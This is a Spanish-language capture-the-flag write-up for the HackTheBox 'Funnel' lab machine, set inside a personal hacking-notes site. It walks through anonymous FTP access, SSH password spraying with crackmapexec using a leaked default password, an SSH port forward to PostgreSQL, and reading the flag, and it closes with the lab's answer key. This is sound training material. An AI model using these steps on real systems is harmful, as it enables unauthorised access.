beafn28
  • 👩‍💻¡Bienvenidos a mi HackBook!
  • WRITEUPS
    • DockerLabs
      • BuscaLove
      • Amor
      • Injection
      • BorazuwarahCTF
      • Trust
      • Picadilly
      • Pinguinazo
      • AguaDeMayo
      • BreakMySSH
      • NodeClimb
      • Move
      • Los 40 ladrones
      • Vulnvault
      • Pntopntobarra
      • Library
      • Escolares
      • ConsoleLog
      • Vacaciones
      • Obsession
      • FirstHacking
      • SecretJenkins
      • HedgeHog
      • AnonymousPingu
      • ChocolateLovers
      • Dockerlabs
      • Pressenter
      • Candy
      • JenkHack
      • ShowTime
      • Upload
      • Verdejo
      • WalkingCMS
      • WhereIsMyWebShell
      • Whoiam
      • Winterfell
      • -Pn
      • Psycho
      • Mirame
      • Backend
      • Paradise
      • Balurero
      • Allien
      • Vendetta
      • FindYourStyle
      • Stellarjwt
      • File
      • Redirection (Por completar)
      • Extraviado
      • Patriaquerida
      • Tproot
      • Internship
      • Walking Dead
      • Bicho (Por completar)
      • BaluFood
    • TryHackMe
      • Brooklyn Nine Nine
      • Blue
    • HackTheBox
      • Nibbles
      • Starting Point
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Explosion
        • Preignition
        • Mongod
        • Synced
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
        • Included
        • Markup
        • Base
      • BoardLight
      • Cap
      • TwoMillion
      • Lame
      • Legacy
      • Devel
      • Beep
      • Optimum
      • Arctic
      • Jerry
      • Sau
      • GoodGames
      • Challenges
        • Emdee five for life
        • MarketDump
      • Intro to Dante
      • Heist
      • OpenAdmin
      • Nest
      • Curling
    • Vulnhub
      • Wakanda
      • Election (Por terminar)
    • The Hacker Labs
      • Avengers
      • Can you hack me?
      • Fruits
      • Microchoft
      • TickTakRoot
      • Grillo
      • Mortadela
      • Zapas Guapas
      • Sal y Azúcar
      • Cyberpunk
      • Papafrita
      • PizzaHot
      • Decryptor
      • Academy
      • Cocido andaluz
      • Find Me
      • Quokka
      • Campana Feliz
      • Bocata de Calamares
      • Casa Paco
      • Torrijas
    • Vulnyx
      • Fuser
      • Blogguer
      • Lower
      • Exec
      • Diff3r3ntS3c
      • Hacking Station
      • Experience
      • Eternal
      • Agent
      • Infected
      • Admin
      • War
      • Hosting
    • OverTheWire
      • Natas
        • Nivel 0-5
        • Nivel 6-11
        • Nivel 12-17
        • Nivel 18-23
        • Nivel 24-29
        • Nivel 30-34
      • Leviathan
        • Nivel 0-7
      • Krypton
      • Bandit
        • Nivel 0-10
        • Nivel 11-20
        • Nivel 21-30
        • Nivel 31-34
    • Proving Ground Play
      • Monitoring
      • DriftingBlues6
  • APUNTES HACKING
    • Pentesting Basics
      • Web Enumeration
      • Public Exploits
      • Types of Shells
      • Privilege Escalation
      • Transfering Files
    • Network Enumeration with NMAP
      • Host Discovery
      • Host and Port Scanning
      • Saving the Results
      • Service Enumeration
      • Nmap Scripting Engine
      • Performance
      • Firewall and IDS/IPS Evasion
    • Footprinting
      • Domain Information
      • Cloud Resources
      • FTP
      • SMB
      • NFS
      • DNS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
      • Linux Remote Management Protocols
      • Windows Remote Management Protocols
    • Information Gathering - Web Edition
      • WHOIS
      • DNS
        • Digging DNS
      • Subdomains
        • Subdomain Bruteforcing
        • DNS Zone Transfers
        • Virtual Hosts
        • Certificate Transparency Logs
      • Fingerprinting
      • Crawling
        • robots.txt
        • Well-Known URIs
        • Creepy Crawlies
      • Search Engine Discovery
      • Web Archives
      • Automating Recon
    • Vulnerability Assessment
      • Vulnerability Assessment
      • Assessment Standards
      • Common Vulnerability Scoring System (CVSS)
      • Common Vulnerabilities and Exposures (CVE)
    • Nessus
      • Getting Started with Nessus
      • Nessus Scan
      • Advanced Settings
      • Working with Nessus Scan Output
      • Scanning Issues
    • OpenVAS
      • OpenVAS Scan
      • Exporting The Results
    • Reporting
    • File Transfers
      • Windows File Transfer Methods
      • Linux File Transfer Methods
      • Transferring Files with Code
      • Miscellaneous File Transfer Methods
      • Protected File Transfers
      • Catching Files over HTTP/S
      • Living off The Land
      • Detection
      • Evading Detection
    • Shells & Payloads
      • Anatomy of a Shell
      • Bind Shells
      • Reverse Shells
      • Payloads
        • Automating Payloads & Delivery with Metasploit
        • Crafting Payloads with MSFvenom
        • Infiltrating Windows
        • Infiltrating Unix/Linux
        • Spawning Interactive Shells
      • Introduction to Web Shells
        • Laudanum, One Webshell to Rule Them All
        • Antak Webshell
        • PHP Web Shells
      • Detection & Prevention
    • Metasploit
      • MSFConsole
      • Modules
      • Targets
      • Payloads
      • Encoders
      • Databases
      • Plugins
      • Sessions
      • Meterpreter
      • Writing and Importing Modules
      • Introduction to MSFVenom
      • Firewall and IDS/IPS Evasion
    • Password Attacks
      • John The Ripper
      • Network Services
      • Password Mutations
      • Password Reuse / Default Passwords
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
      • Pass the Hash (PtH)
  • WEB SECURITY
    • Path Traversal
    • SQL Injection
    • Control de Acceso
  • Mis CTFs
    • Pequeñas Mentirosas
    • CryptoLabyrinth
    • Elevator
    • Facultad
  • PREPARAR EJPTv2
    • Máquinas
    • Curso de Mario
      • Presentación + Preparación de Laboratorios
      • Conceptos Básicos de Hacking
      • Explotación de Vulnerabilidades y Ataques de Fuerza Bruta
      • Explotación vulnerabilidades Web
      • Enumeración y Explotación del Protócolo SMB, SAMBA, SNMP, IIS y RDP
      • Hacking Entornos CMS
      • Escalada de Privilegios + Post Explotación
      • Pivoting con Metasploit
  • Preparar OSCP
    • Información
    • Máquinas
      • Linux
        • Fácil
        • Medio
        • Difícil
      • Windows
        • Fácil
        • Medio
        • Difícil
  • PREPARAR PT1
    • Organización
Powered by GitBook
On this page
  • 1. 📝 Introducción
  • 2. 🛠️ Entorno
  • 3. 🔍 Reconocimiento
  • 4. 🚪 Acceso Inicial
  • 5. 🔑 Captura de la Flag
  • 6. ❓Preguntas

Was this helpful?

  1. WRITEUPS
  2. HackTheBox
  3. Starting Point

Funnel

1. 📝 Introducción

  • Nivel de Dificultad: Muy fácil.

  • Tags:

    • FTP (File Transfer Protocol): Es un protocolo de red utilizado para transferir archivos entre sistemas a través de una red TCP/IP. Aunque es ampliamente utilizado, FTP no cifra la información que se transmite, lo que lo convierte en un objetivo fácil para los atacantes que interceptan el tráfico en redes no seguras, lo que puede dar lugar al robo de archivos o credenciales.

    • PostgreSQL: Es un sistema de gestión de bases de datos relacional de código abierto, conocido por su estabilidad y rendimiento. Sin embargo, si no se configura adecuadamente o se dejan configuraciones por defecto, puede ser vulnerable a ataques como la inyección SQL, el acceso no autorizado a bases de datos o la ejecución de comandos maliciosos en el servidor.

    • Reconnaissance (Reconocimiento): Es la fase inicial de las pruebas de penetración, donde se recopila información detallada sobre el objetivo. Esto incluye escaneo de puertos, identificación de servicios, descubrimiento de posibles vulnerabilidades y análisis de la infraestructura. El reconocimiento permite a los atacantes identificar los puntos débiles que pueden ser explotados.

    • Tunneling (Tunelización): Es una técnica que permite a los atacantes o administradores de red establecer una conexión segura entre dos sistemas a través de una red no segura. Esto se logra encapsulando paquetes de datos dentro de otros, lo que permite eludir las restricciones de firewall o de red. Los atacantes pueden usar túneles para acceder a sistemas protegidos o para ocultar su tráfico.

    • Password Spraying (Rociado de Contraseñas): Es un tipo de ataque de fuerza bruta en el que un atacante intenta un número limitado de contraseñas comunes en muchas cuentas diferentes, en lugar de intentar adivinar la contraseña de una sola cuenta. Este ataque es efectivo cuando las contraseñas comunes no se han cambiado y puede ser más difícil de detectar que un ataque tradicional de fuerza bruta.

    • Port Forwarding (Redirección de Puertos): Es un proceso mediante el cual se reenvía el tráfico de una red a un puerto específico de un servidor dentro de una red privada. Esta técnica es utilizada por los atacantes para acceder a servicios internos de una red desde fuera, explotando configuraciones de red incorrectas o mal implementadas.

    • Anonymous/Guest Access (Acceso Anónimo/Acceso de Invitado): Se refiere a permitir que los usuarios se conecten a sistemas o servicios sin autenticarse, o con privilegios mínimos. Aunque puede ser útil para la accesibilidad, también representa un riesgo de seguridad, ya que los atacantes pueden aprovechar estas cuentas para obtener acceso no autorizado a sistemas sensibles.

    • Clear Text Credentials (Credenciales en Texto Claro): Son credenciales de acceso (como nombres de usuario y contraseñas) que se transmiten sin cifrar, lo que significa que pueden ser interceptadas fácilmente en una red. El uso de credenciales en texto claro es una vulnerabilidad grave, ya que cualquier atacante con acceso al tráfico de red puede robarlas y acceder a los sistemas protegidos.

2. 🛠️ Entorno

Nos descargamos nuestra VPN y nos conectamos.

sudo openvpn nombre_del_archivo.vpn

Iniciamos la máquina y verificamos la conexión.

ping -c 1 10.129.224.43

Observamos que tenemos conexión y que es una máquina Linux ya que su ttl=63.

3. 🔍 Reconocimiento

A continuación, se realiza el comando:

nmap -sCV -Pn 10.129.224.43

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

4. 🚪 Acceso Inicial

Como podemos observar durante el escaneo, el puerto 21 perteneciente al servicio FTP y el puerto 22 correspondiente a SSH están abiertos. A continuación, se indagará más sobre estos servicios.

Como podemos loguearnos con el usuario Anonymous vamos a ello.

ftp 10.129.224.43

Nos descargamos los archivos pertinentes.

Vemos su contenido.

xdg-open password_policy.pdf

Tenemos una contraseña. Revisamos el otro archivo.

Hay varios posibles usuarios por lo que creamos un diccionario con ellos para realizar fuerza bruta.

crackmapexec ssh 10.129.224.43 -u users.txt -p 'funnel123#!#'

Iniciamos sesión.

ssh christine@10.129.224.43

Para redirigir la instancia de PostgreSQL a tu máquina local, utilizamos el siguiente comando SSH:

ssh -L 1234:localhost:5432 christine@10.129.224.43

En otra instancia.

psql -U christine -h localhost -p 1234

Listamos databases.

\l

Nos conectamos a secrets.

\c secrets

5. 🔑 Captura de la Flag

Seleccionamos la flag.

SELECT * FROM flag;

6. ❓Preguntas

Task 1 ¿Cuántos puertos TCP están abiertos? 🔹 Respuesta: 2

Task 2 ¿Cuál es el nombre del directorio disponible en el servidor FTP? 🔹 Respuesta: mail_backup

Task 3 ¿Cuál es la contraseña predeterminada que todo nuevo miembro del equipo "Funnel" debe cambiar lo antes posible? 🔹 Respuesta: funnel123#!#

Task 4 ¿Qué usuario no ha cambiado su contraseña predeterminada aún? 🔹 Respuesta: christine

Task 5 ¿Qué servicio se está ejecutando en el puerto TCP 5432 y solo escucha en localhost? 🔹 Respuesta: PostgreSQL

Task 6 Dado que no puedes acceder al servicio mencionado desde la máquina local, debes crear un túnel y conectarte a él desde tu máquina. ¿Cuál es el tipo correcto de túnel a utilizar? ¿Reenvío de puerto remoto o reenvío de puerto local? 🔹 Respuesta: local port forwarding

Task 7 ¿Cuál es el nombre de la base de datos que contiene la flag? 🔹 Respuesta: secrets

Task 8 ¿Podrías usar un túnel dinámico en lugar de un reenvío de puerto local? Sí o No. 🔹 Respuesta: Sí

PreviousBikeNextPennyworth

Last updated 4 months ago

Was this helpful?